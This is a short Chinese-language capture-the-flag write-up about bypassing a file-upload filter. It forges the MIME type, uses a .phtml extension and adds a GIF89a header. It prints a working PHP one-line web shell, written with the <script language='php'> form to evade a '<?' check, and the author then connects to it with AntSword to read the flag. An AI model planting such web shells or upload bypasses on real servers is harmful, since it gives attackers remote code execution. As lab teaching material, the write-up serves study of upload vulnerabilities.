前期基础的修改了MIME值为image/jpeg,file后缀改为phtml,但最初写入的是普通的一句话木马,会爆出错误
NO! HACKER! your file included <“;?”; 即’<?’
即文件中不能有<?
HTML 实体
在 HTML 中,某些字符是预留的。
在 HTML 中不能使用小于号(<)和大于号(>),这是因为浏览器会误认为它们是标签。
如果希望正确地显示预留字符,我们必须在 HTML 源代码中使用字符实体(character entities)。
字符实体类似这样:
&entity_name;
或者
&#entity_number;
详情在此
所以payload如下了:
<script language='php'>eval($_POST['a']);</script>
尝试发包后显示:
其实文件上传无非就是一些特征值的修改。前缀加上GIF89a
eg:其实也可以直接下个图,用notepad打开,在后缀加上木马然后按步骤上传,也是可以的。道理一致。
成功上传。然后访问upload下的个人文件,连接蚁剑,找到flag。